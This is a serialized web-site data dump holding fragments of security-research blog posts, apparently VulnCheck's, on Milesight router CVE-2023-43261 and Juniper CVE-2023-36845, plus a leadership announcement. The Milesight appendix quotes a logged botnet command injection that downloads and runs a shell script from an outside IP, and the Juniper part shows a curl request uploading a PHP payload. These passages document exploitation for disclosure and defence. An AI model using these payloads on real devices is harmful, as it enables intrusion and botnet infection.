line":1376},[1373,86783,86784],{"class":5467},"2023-10-04",[1373,86786,52192],{"class":5467},[1373,86788,4606],{"class":4640},[1373,86790,37766],{"class":5467},[1373,86792,4606],{"class":4640},[1373,86794,36914],{"class":5467},[1373,86796,76315],{"class":1383},[1373,86798,86799],{"class":5467},"200.73",[1373,86801,59],{"class":28571},[1373,86803,86804],{"class":5467},"18.40",[1373,86806,86807],{"class":28571},":admin",[1373,86809,15050],{"class":1383},[1373,86811,86215],{"class":4640},[1373,86813,9149],{"class":1383},[1373,86815,183],{"class":9152},[1373,86817,26412],{"class":9155},[1373,86819,183],{"class":9152},[1373,86821,4606],{"class":1383},[1373,86823,65524],{"class":5467},[1373,86825,5437],{"class":1383},[1373,86827,183],{"class":9152},[1373,86829,51343],{"class":9155},[1373,86831,183],{"class":9152},[1373,86833,4606],{"class":1383},[1373,86835,467],{"class":5467},[1373,86837,5437],{"class":1383},[1373,86839,183],{"class":9152},[1373,86841,86250],{"class":9155},[1373,86843,183],{"class":9152},[1373,86845,4606],{"class":1383},[1373,86847,183],{"class":9173},[1373,86849,86850],{"class":9176},"yruo_firewall_security",[1373,86852,183],{"class":9173},[1373,86854,5437],{"class":1383},[1373,86856,183],{"class":9152},[1373,86858,8560],{"class":9155},[1373,86860,183],{"class":9152},[1373,86862,4606],{"class":1383},[1373,86864,183],{"class":9173},[1373,86866,86867],{"class":9176},"set",[1373,86869,183],{"class":9173},[1373,86871,5437],{"class":1383},[1373,86873,183],{"class":9152},[1373,86875,86284],{"class":9155},[1373,86877,183],{"class":9152},[1373,86879,86289],{"class":1383},[1373,86881,183],{"class":9152},[1373,86883,86884],{"class":9165},"base",[1373,86886,183],{"class":9152},[1373,86888,4606],{"class":1383},[1373,86890,183],{"class":9173},[1373,86892,86850],{"class":9176},[1373,86894,183],{"class":9173},[1373,86896,5437],{"class":1383},[1373,86898,183],{"class":9152},[1373,86900,86901],{"class":9165},"index",[1373,86903,183],{"class":9152},[1373,86905,4606],{"class":1383},[1373,86907,467],{"class":5467},[1373,86909,5437],{"class":1383},[1373,86911,183],{"class":9152},[1373,86913,85021],{"class":9165},[1373,86915,183],{"class":9152},[1373,86917,8304],{"class":1383},[1373,86919,183],{"class":9152},[1373,86921,86923],{"class":86922},"sTC9v","http_remote",[1373,86925,183],{"class":9152},[1373,86927,4606],{"class":1383},[1373,86929,467],{"class":5467},[1373,86931,5437],{"class":1383},[1373,86933,183],{"class":9152},[1373,86935,86936],{"class":86922},"https_remote",[1373,86938,183],{"class":9152},[1373,86940,4606],{"class":1383},[1373,86942,467],{"class":5467},[1373,86944,5437],{"class":1383},[1373,86946,183],{"class":9152},[1373,86948,86949],{"class":86922},"telnet_remote",[1373,86951,183],{"class":9152},[1373,86953,4606],{"class":1383},[1373,86955,467],{"class":5467},[1373,86957,5437],{"class":1383},[1373,86959,183],{"class":9152},[1373,86961,86962],{"class":86922},"ssh_remote",[1373,86964,183],{"class":9152},[1373,86966,4606],{"class":1383},[1373,86968,467],{"class":5467},[1373,86970,5437],{"class":1383},[1373,86972,183],{"class":9152},[1373,86974,86975],{"class":86922},"ftp_local",[1373,86977,183],{"class":9152},[1373,86979,4606],{"class":1383},[1373,86981,467],{"class":5467},[1373,86983,5437],{"class":1383},[1373,86985,183],{"class":9152},[1373,86987,86988],{"class":86922},"ftp_remote",[1373,86990,183],{"class":9152},[1373,86992,4606],{"class":1383},[1373,86994,467],{"class":5467},[1373,86996,5437],{"class":1383},[1373,86998,183],{"class":9152},[1373,87000,7585],{"class":86922},[1373,87002,183],{"class":9152},[1373,87004,81544],{"class":1383},[1373,87006,183],{"class":9173},[1373,87008,87009],{"class":9176},"http:\u002F\u002F",[1373,87011,183],{"class":9173},[1373,87013,27625],{"class":1383},[1373,87015,183],{"class":9152},[1373,87017,87018],{"class":86922},"keyword",[1373,87020,183],{"class":9152},[1373,87022,81544],{"class":1383},[1373,87024,7083],{"class":9173},[1373,87026,87027],{"class":1383},"]}}]}\n",[18,87029,87030,87031,87033],{},"Of course, it’s difficult to determine exactly what is an attacker and what is a bad admin. Maybe the real administrator ",[1131,87032,4563],{}," log in using a VPN in Chile. We suspect not, but anything is possible, which is why we leave this at “probably exploited in the wild” but not at scale.",[1920,87035,1903],{"id":1902},[18,87037,87038],{},"Our interest in CVE-2023-43261 centered around the idea that there were a lot of vulnerable routers that might provide attackers with access to ICS networks. We learned, in reality, CVE-2023-43261 was patched long ago. The CVE description is not only inadequate but also inaccurate, and the vast majority of internet-facing systems are patched. Nonetheless, , we do see some evidence of exploitation in the wild.",[18,87040,87041],{},"If you have a Milesight Industrial Cellular Router, it’s probably wise to assume all the credentials on the system have been compromised and to simply generate new ones, and ensure no interfaces are reachable via the internet.",[1920,87043,87045],{"id":87044},"appendix","Appendix",[18,87047,87048],{},"Somewhat related to all of the above, but slightly beside the point, is that these routers end up logging a lot of information from unauthenticated users. One request most of the routers ended up logging looks like this:",[1354,87050,87052],{"className":31740,"code":87051,"language":2186,"meta":219,"style":219},"2023-10-04 16:59:49 [103.83.144.161:Not Loggined in]:data: command=2&ipAddr=&dnsAddr=$(cd+\u002Ftmp;wget+http:\u002F\u002F194.180.48[.]100\u002Fl.sh;curl+-O+http:\u002F\u002F194.180.48[.]100\u002Fl.sh;sh+l.sh)&interface=0&netType=0&scrFilter=&dstFilter=&fi\n",[886,87053,87054],{"__ignoreMap":219},[1373,87055,87056,87058,87061,87064,87067,87070,87073,87075,87077,87080,87082,87084,87087,87089,87092,87094,87097,87099,87102,87104,87107,87109,87112,87115,87118,87120,87122,87124,87127,87129,87131,87133,87136,87138,87140,87143,87145,87147],{"class":1375,"line":1376},[1373,87057,86784],{"class":2206},[1373,87059,87060],{"class":1391}," 16:59:49",[1373,87062,87063],{"class":4640}," [103.83.144.161:Not ",[1373,87065,87066],{"class":1391},"Loggined",[1373,87068,87069],{"class":1391}," in]:data:",[1373,87071,87072],{"class":1391}," command=",[1373,87074,353],{"class":5467},[1373,87076,7218],{"class":1383},[1373,87078,87079],{"class":4640},"ipAddr",[1373,87081,5417],{"class":1397},[1373,87083,7218],{"class":1383},[1373,87085,87086],{"class":4640},"dnsAddr",[1373,87088,5417],{"class":1397},[1373,87090,87091],{"class":1383},"$(",[1373,87093,21460],{"class":1379},[1373,87095,87096],{"class":1391},"+\u002Ftmp",[1373,87098,39663],{"class":1383},[1373,87100,87101],{"class":2206},"wget+http:\u002F\u002F194.180.48[.]100\u002Fl.sh",[1373,87103,39663],{"class":1383},[1373,87105,87106],{"class":2206},"curl+-O+http:\u002F\u002F194.180.48[.]100\u002Fl.sh",[1373,87108,39663],{"class":1383},[1373,87110,87111],{"class":2206},"sh+l.sh",[1373,87113,87114],{"class":1383},")&",[1373,87116,87117],{"class":4640},"interface",[1373,87119,5417],{"class":1397},[1373,87121,445],{"class":1391},[1373,87123,7218],{"class":1383},[1373,87125,87126],{"class":4640},"netType",[1373,87128,5417],{"class":1397},[1373,87130,445],{"class":1391},[1373,87132,7218],{"class":1383},[1373,87134,87135],{"class":4640},"scrFilter",[1373,87137,5417],{"class":1397},[1373,87139,7218],{"class":1383},[1373,87141,87142],{"class":4640},"dstFilter",[1373,87144,5417],{"class":1397},[1373,87146,7218],{"class":1383},[1373,87148,87149],{"class":4636},"fi\n",[18,87151,87152,87153,87158,87159,87164,87165,87170],{},"This appears to be the ",[47,87154,87157],{"href":87155,"rel":87156},"https:\u002F\u002Fwww.radware.com\u002Fsecurity\u002Fthreat-advisories-and-attack-reports\u002Fdark-iot-botnet\u002F",[51],"Dark.IoT"," botnet throwing ",[47,87160,87163],{"href":87161,"rel":87162},"https:\u002F\u002Fresearch.nccgroup.com\u002F2021\u002F07\u002F26\u002Ftechnical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380\u002F",[51],"CVE-2021-36380",". We’ve put the MIPS version of the downloaded binary on ",[47,87166,87169],{"href":87167,"rel":87168},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fba0481b0a57c4e94b59b6a3f20ba1c41a8329c88cf01c578ac734f3638ecfa59\u002Fdetection",[51],"VirusTotal",". The binary has a few additional exploits it uses for spreading.",[2901,87172,87173],{},"html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .s4fT8, html code.shiki .s4fT8{--shiki-light:#90A4AE;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sTC9v, html code.shiki .sTC9v{--shiki-light:#F76D47;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}",{"title":219,"searchDepth":220,"depth":220,"links":87175},[87176],{"id":86356,"depth":220,"text":86357},"2023-10-13","VulnCheck was excited to breach ICS networks when CVE-2023-43261 was first disclosed. However, there is more to this than the CVE description would lead you to believe. Follow VulnCheck’s journey from CVE description to exploitation in the wild",{"slug":87180},"real-world-cve-2023-43261","\u002Fblog\u002Freal-world-cve-2023-43261",{"title":83541,"description":87178},"blog\u002Freal-world-cve-2023-43261",[242,23275],"9fSq1I-Qm_9xlXlDWUO2toqi5A9LLU8Dkdj5wglQ0jg",{"id":87187,"title":87188,"articles":7,"authors":87189,"body":87191,"date":87303,"description":87304,"extension":234,"image":7,"link":7,"meta":87305,"navigation":237,"path":87307,"seo":87308,"series":7,"stem":87309,"subtype":7,"tags":7,"__hash__":87310},"blog\u002Fblog\u002Fjoining-vulncheck.md","Growth Starts with People",[87190],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":87192,"toc":87300},[87193,87196,87199,87202,87209,87212,87220,87223,87227,87234,87240,87247,87254,87259,87262,87268,87271,87280,87285,87288,87291,87294,87297],[18,87194,87195],{},"Joining a new company - it’s always an adjustment in many respects. And joining a new startup? That also requires some shifting of your mindset. And for many reasons, depending on how early or even late-stage the venture is.",[18,87197,87198],{},"However, one thing that one of my mentors always said to me was, ‘You have to be vested in the problem you're trying to solve. Remember why you’re there.’",[18,87200,87201],{},"The older I get, the more important the is, and it’s not just believing in a mission statement either - it’s about applying the innovation, skill, domain expertise and the critical thinking that you believe in to challenge the status quo, and grow a company into something great.",[18,87203,87204,87205,87208],{},"I’m happy to announce that I have joined ",[47,87206,2709],{"href":78319,"rel":87207},[51]," as Chief Marketing Officer, to help bring visibility and validation to our brand, to support customer growth and to help deliver exceptional security research insights to the market in many forms.",[18,87210,87211],{},"What we’re building at VulnCheck is unlike any other company in how we identify potentially exploitable vulnerabilities with speed and precision that is simply not possible anywhere else. The energy, the collaboration and the quick path to innovating is palpable and we are going to take the cybersecurity world by storm!",[18,87213,87214,87215,87219],{},"What’s exciting is that today we announced new members of our leadership team, all of whom have incredible experience in building successful cybersecurity ventures. You can read the announcement here. And you can check out our snazzy new ",[47,87216,87218],{"href":87217},"\u002Fcompany\u002Fabout","leadership team"," section here, compliments of Kevin Olson!",[18,87221,87222],{},"Because we couldn’t fit it all into the press release, each new team member has supplied a reason for joining VulnCheck. And I’ll just say it - with this experienced, domain-savvy team of all-stars, we're well-positioned for growth, scale ad most importantly, helping the cybersecurity ecosystem get better and faster in defending businesses worldwide!",[61,87224,87226],{"id":87225},"our-teams-perspectives","Our Team’s Perspectives",[43656,87228,87231],{"author":87229,"position":87230},"Ralph Logan","Chief Strategy Officer",[18,87232,87233],{},"“Having driven product strategy and development in the security product market for decades, I leapt at the opportunity to come aboard after learning about VulnCheck’s market differentiating offerings. Their key differentiators in Exploit Intelligence and Initial Access Intelligence to better assist enterprises hunt and defense efforts are unparalleled and they are leaps and bounds beyond other’s efforts.”",[43656,87235,87237],{"author":10391,"position":87236},"Chief Technology Officer",[18,87238,87239],{},"“Before joining VulnCheck, I had the opportunity to demo the product, and I was blown away by the quantity and quality of the intelligence. I'd seen nothing like it before. I was already enthusiastic about the product when Anthony and I began discussing how I might fit into the company. Our discussions resulted in a complementary new product called \"Initial Access Intelligence\" which contains closed-source intelligence generated by VulnCheck researchers. On the strength of VulnCheck's open source intelligence, with the additional unique insights from our closed-source intelligence, I knew VulnCheck was destined to become a force in the market.”",[43656,87241,87244],{"author":87242,"position":87243},"Thomas Bain","Chief Marketing Officer",[18,87245,87246],{},"“I’m excited about the opportunity with VulnCheck because we’re doing something that no one else is doing, and it is a true game-changer for the entire cybersecurity universe. VulnCheck is rewriting the playbook on vulnerability and exploit intelligence, and is helping customers increase the velocity and vulnerability validity to detect threats that matter.”",[43656,87248,87251],{"author":87249,"position":87250},"David Munson","Vice President, Engineering",[18,87252,87253],{},"“In my career in security, valuable intelligence was always very short lived and palimpsest. Value was only revealed with context that you had to build or join with other data sets. VulnCheck brings context to intelligence and helps the fight against adversaries. This is the data I wanted when I was on the defense. I’m excited to provide a force multiplier to defenders.”",[18,87255,87256],{},[295,87257,87258],{},"What is Different About VulnCheck?",[18,87260,87261],{},"I’ll come back to the problem we solve, with some context on how we’re solving it, and why I believe this company is going to be the stickiest provider in cyber threat intelligence ecosystem:",[18,87263,87264,87267],{},[295,87265,87266],{},"The Problem we are Solving","\nAs I said above - it’s essential to have a deep belief that the problem you are solving to vest into everything it takes to help in building a sustainable business. The attack landscape, and the ecosystem with which organizations are being targeted has evolved with the pace of digital business.",[18,87269,87270],{},"In other words, for attackers, they’re looking for faster returns and easier yet lucrative outcomes. Whether it’s disruption of critical services or theft - - it’s become essential to modernize how you manage vulnerabilities before they are exploited. The emergence of OSS has really changed the economics and the dynamics of how attackers pluck out vulnerabilities to exploit.",[18,87272,87273,87274,87279],{},"In fact, at ",[47,87275,87278],{"href":87276,"rel":87277},"https:\u002F\u002Fwww.mandiant.com\u002Fevents\u002Frsac",[51],"Mandiant’s keynote presentation at RSAC in April",", they disclosed that 32% of breaches tracked in 2022 were the result of exploits - - that is the first time that the top root source of breaches has NOT been phishing. This means that things are changing and VulnCheck is the right company at the right time to help solve this exact challenge.",[18,87281,87282],{},[295,87283,87284],{},"Exploits, Not Just Vulnerabilities",[18,87286,87287],{},"Vulnerability management has been a cybersecurity discipline for many years at this point. Not only is it a large market in terms of its market size, but its a critical component of any enterprise SOC or DevSecOps team. But what happens when an attacker randomly selects one of millions of known vulnerabilities and decides to exploit, and that vulnerability is persistent in 90% of software deployed in the enterprise? You have a problem.",[18,87289,87290],{},"Less than 3% of vulnerabilities are ACTUALLY exploited. Why? Its an expensive endeavor to shop, pay for and subsequently build exploits for zero-days. Its a lot cheaper to build exploits for known vulnerabilities. That’s why Log4shell was such a wake-up call that forced national legislation, as well as a number of industry-related regulations.",[18,87292,87293],{},"This is where VulnCheck is leveraging the expertise of some of the foremost security researchers in the world to build a real-time solution that does not require the build-out of scripts against the CISA KEV, featuring 5X more exploits vs any other solution and is building out a way for cybersecurity firms, government agencies and enterprise organizations to automatically enrich detections with the richest data set available.",[18,87295,87296],{},"Again, the excitement in the air at VulnCheck is real, and our growing list of customers are enabling us to build a truly different company that is maniacally focused on changing how organizations are managing vulnerabilities!!!",[87298,87299],"contact-cta",{},{"title":219,"searchDepth":220,"depth":220,"links":87301},[87302],{"id":87225,"depth":220,"text":87226},"2023-10-12","VulnCheck is excited to announce four new leadership team additions!",{"slug":87306},"joining-vulncheck","\u002Fblog\u002Fjoining-vulncheck",{"title":87188,"description":87304},"blog\u002Fjoining-vulncheck","ked_57MpNPcrz1jmCfNZoyXieqehEelHMn6cXPtKhgc",{"id":87312,"title":35931,"articles":87313,"authors":87368,"body":87370,"date":87317,"description":89198,"extension":234,"image":7,"link":7,"meta":89199,"navigation":237,"path":89201,"seo":89202,"series":7,"stem":89203,"subtype":7,"tags":89204,"__hash__":89205},"blog\u002Fblog\u002Fjuniper-cve-2023-36845.md",[87314,87318,87321,87326,87329,87332,87335,87338,87341,87346,87349,87352,87357,87361,87365],{"title":87315,"source":14373,"link":87316,"date":87317},"Thousands of Juniper devices vulnerable to unauthenticated RCE flaw","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fthousands-of-juniper-devices-vulnerable-to-unauthenticated-rce-flaw\u002F","2023-09-18",{"title":87319,"source":3481,"link":87320,"date":87317},"Thousands of Juniper Junos firewalls still open to hijacks, exploit code available to all","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F09\u002F18\u002Fjuniper_firewalls_rce\u002F",{"title":87322,"source":87323,"link":87324,"date":87325},"Microsoft AI Researchers Accidentally Exposed Tens of Terabytes of Sensitive Data","Metacurity Newsletter","https:\u002F\u002Fmetacurity.substack.com\u002Fp\u002Fmicrosoft-ai-researchers-accidentally","2023-09-19",{"title":87327,"source":14390,"link":87328,"date":87325},"12,000 JUNIPER SRX FIREWALLS AND EX SWITCHES VULNERABLE TO CVE-2023-36845","https:\u002F\u002Fsecurityaffairs.com\u002F151037\u002Fhacking\u002F12000-juniper-devices-cve-2023-36845.html",{"title":87330,"source":14378,"link":87331,"date":87325},"Thousands of Juniper Appliances Vulnerable to New Exploit","https:\u002F\u002Fwww.securityweek.com\u002Fthousands-of-juniper-appliances-vulnerable-to-new-exploit\u002F",{"title":87333,"source":37282,"link":87334,"date":87325},"Snap! -- Halloween Rules, Artificial Neurons, Artificial Womb, Helpdesk Hackers","https:\u002F\u002Fcommunity.spiceworks.com\u002Ftopic\u002F2494581-snap-halloween-rules-artificial-neurons-artificial-womb-helpdesk-hackers?from_forum=6339",{"title":87336,"source":39566,"link":87337,"date":87325},"Cyberespionage and state-directed cybercrime. BlackCat's recent activity. Water commission under attack. Notes on cyber phases of a hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F178",{"title":87339,"source":14382,"link":87340,"date":87325},"Nearly 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability","https:\u002F\u002Fthehackernews.com\u002F2023\u002F09\u002Fover-12000-juniper-firewalls-found.html",{"title":87342,"source":87343,"link":87344,"date":87345},"Cyber Security Today, Sept. 20, 2023 – A new online card-skimming campaign, new WinServer backdoors and more","ITWorld Canada's Cyber Security Today podcast","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-sept-20-2023-a-new-online-card-skimming-campaign-new-winserver-backdoors-and-more\u002F547222","2023-09-20",{"title":87347,"source":11233,"link":87348,"date":87345},"New RCE flaw impacts thousands of Juniper firewall devices","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fnew-rce-flaw-impacts-thousands-of-juniper-firewall-devices",{"title":87350,"source":60960,"link":87351,"date":87345},"Thousands of Juniper firewalls are open to serious attack","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fthousands-of-juniper-firewalls-are-open-to-serious-attack",{"title":87353,"source":87354,"link":87355,"date":87356},"NCURSES & BAD THINGS, LVFS IS NOT A BACKDOOR, PHYSICAL PROXIMITY, & OH, FORTINET! – PSW #799","SC Media in Paul's Security Weekly podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002F11997-ncurses-bad-things-lvfs-is-not-a-backdoor-physical-proximity-oh-fortinet-psw-799","2023-09-21",{"title":87358,"source":14390,"link":87359,"date":87360},"SECURITY AFFAIRS NEWSLETTER ROUND 438 BY PIERLUIGI PAGANINI – INTERNATIONAL EDITION","https:\u002F\u002Fsecurityaffairs.com\u002F151293\u002Fbreaking-news\u002Fsecurity-affairs-newsletter-round-438-by-pierluigi-paganini-international-edition.html","2023-09-24",{"title":87362,"source":14390,"link":87363,"date":87364},"CISA ADDS FIVE VULNERABILITIES IN JUNIPER DEVICES TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG","https:\u002F\u002Fsecurityaffairs.com\u002F154128\u002Fsecurity\u002Fcisa-juniper-flaws-known-exploited-vulnerabilities-catalog.html","2023-11-13",{"title":87366,"source":14373,"link":87367,"date":82185},"Juniper warns of critical RCE bug in its firewalls and switches","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fjuniper-warns-of-critical-rce-bug-in-its-firewalls-and-switches\u002F#google_vignette",[87369],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":87371,"toc":89185},[87372,87398,87400,87416,87418,87437,87457,87491,87494,87498,87519,87535,87552,87891,87897,87901,87909,87914,87925,87930,87954,88409,88412,88416,88423,88429,88441,88447,88453,88458,88461,88764,88767,88771,88774,88777,88779,88783,88791,88794,88798,88804,88827,88830,88909,88913,88927,89182],[18,87373,87374,87379,87380,87385,87386,87391,87392,87397],{},[47,87375,87378],{"href":87376,"rel":87377},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-36845",[51],"CVE-2023-36845"," is a PHP environment variable manipulation vulnerability affecting Juniper ",[47,87381,87384],{"href":87382,"rel":87383},"https:\u002F\u002Fwww.juniper.net\u002Fus\u002Fen\u002Fproducts\u002Fsecurity\u002Fsrx-series.html",[51],"SRX"," firewalls and ",[47,87387,87390],{"href":87388,"rel":87389},"https:\u002F\u002Fwww.juniper.net\u002Fus\u002Fen\u002Fproducts\u002Fswitches\u002Fex-series.html",[51],"EX"," switches. ",[47,87393,87396],{"href":87394,"rel":87395},"https:\u002F\u002Fsupportportal.juniper.net\u002Fs\u002Farticle\u002F2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US",[51],"Juniper scored"," the vulnerability as a medium severity issue. However, in this blog, we’ll show you how this vulnerability alone can achieve remote, unauthenticated code execution without even touching the disk.",[61,87399,20],{"id":3520},[22,87401,87402,87405,87408],{},[25,87403,87404],{},"VulnCheck developed an exploit for CVE-2023-36845 that allows an unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system.",[25,87406,87407],{},"Approximately 80% of affected internet-facing firewalls remain unpatched.",[25,87409,87410,87411,87415],{},"VulnCheck released a ",[47,87412,87414],{"href":83426,"rel":87413},[51],"vulnerability scanner"," to identify firewalls vulnerable to CVE-2023-36845.",[61,87417,11273],{"id":11272},[18,87419,87420,87421,87425,87426,87430,87431,87436],{},"CVE-2023-36845 (see appendix for CVE clarification) was first described by ",[47,87422,14823],{"href":87423,"rel":87424},"https:\u002F\u002Flabs.watchtowr.com\u002Fcve-2023-36844-and-friends-rce-in-juniper-firewalls\u002F",[51]," in a multi-step file upload ",[47,87427,22852],{"href":87428,"rel":87429},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Ffcb027407d46",[51]," chain. In order to replicate their work, we purchased an ancient ",[47,87432,87435],{"href":87433,"rel":87434},"https:\u002F\u002Fwww.juniper.net\u002Fdocumentation\u002Fproduct\u002Fus\u002Fen\u002Fsrx210\u002F",[51],"SRX210"," from eBay. We quickly learned that the watchTowr exploit didn’t work on our device.",[18,87438,87439,87440,87445,87446,87449,87450,87453,87454,87456],{},"The first part of the watchTowr exploit chain uses ",[47,87441,87444],{"href":87442,"rel":87443},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-36846",[51],"CVE-2023-36846"," to invoke a ",[886,87447,87448],{},"do_fileUpload"," function in the J-Web interface. This results in writing arbitrary files to ",[886,87451,87452],{},"\u002Fvar\u002Ftmp",". Unfortunately, our old SRX210’s J-Web doesn’t have the ",[886,87455,87448],{}," functionality, so the exploit failed:",[1354,87458,87460],{"className":31740,"code":87459,"language":2186,"meta":219,"style":219},"$ curl http:\u002F\u002F10.12.72.1\u002Fwebauth_operation.php -d 'rs=do_upload&rsargs[]=[{\"fileName\": \"test.php\", \"fileData\": \",PD9waHAgDQpwaHBpbmZvKCk7DQo\u002FPg==\", \"csize\": 22}]'\n-:function not callable\n",[886,87461,87462,87481],{"__ignoreMap":219},[1373,87463,87464,87466,87468,87471,87474,87476,87479],{"class":1375,"line":1376},[1373,87465,4644],{"class":2206},[1373,87467,2222],{"class":1391},[1373,87469,87470],{"class":1391}," http:\u002F\u002F10.12.72.1\u002Fwebauth_operation.php",[1373,87472,87473],{"class":2209}," -d",[1373,87475,4713],{"class":1387},[1373,87477,87478],{"class":1391},"rs=do_upload&rsargs[]=[{\"fileName\": \"test.php\", \"fileData\": \",PD9waHAgDQpwaHBpbmZvKCk7DQo\u002FPg==\", \"csize\": 22}]",[1373,87480,76063],{"class":1387},[1373,87482,87483,87486,87488],{"class":1375,"line":220},[1373,87484,87485],{"class":2206},"-:function",[1373,87487,78483],{"class":1391},[1373,87489,87490],{"class":1391}," callable\n",[18,87492,87493],{},"Juniper targets are a delicious meal, though, so we weren’t going to be put off so easily. We began hunting for a secondary file upload mechanism or a new path to code execution. We did find a secondary file upload mechanism (see the appendix), but what we really want to share is a new path to code execution that doesn’t require a file upload at all.",[61,87495,87497],{"id":87496},"a-file-that-isnt","A File That Isn’t",[18,87499,87500,87501,87506,87507,87512,87513,87518],{},"watchTowr’s attack achieves code execution by uploading two files, setting the ",[47,87502,87505],{"href":87503,"rel":87504},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Fconfiguration.file.php",[51],"PHPRC"," environment variable to one of those files, and then using the php.ini 